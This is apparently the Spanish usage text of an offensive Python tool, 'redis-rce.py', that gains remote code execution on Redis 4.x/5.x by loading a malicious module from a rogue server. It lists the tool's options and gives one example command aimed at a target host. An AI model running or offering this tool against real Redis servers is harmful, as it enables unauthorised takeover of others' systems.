
RCE en Redis 4.x/5.x
RCE en Redis 4.x/5.x
#Uso
usage: redis-rce.py [-h] -r RHOST [-p RPORT] -L LHOST [-P LPORT] [-f FILE]
[-a AUTH] [-v]
Redis 4.x/5.x RCE con RedisModules
argumentos opcionales:
-h, --help muestra este mensaje de ayuda y sale
-r RHOST, --rhost RHOST
host de destino
-p RPORT, --rport RPORT
puerto redis de destino, por defecto 6379
-L LHOST, --lhost LHOST
ip del servidor rogue
-P LPORT, --lport LPORT
puerto de escucha del servidor rogue, por defecto 21000
-f FILE, --file FILE RedisModules a cargar, por defecto exp.so
-a AUTH, --auth AUTH contraseña de redis
-v, --verbose muestra más información
python3 redis-rce.py -r 192.168.174.139 -L 192.168.174.131 -f exp.so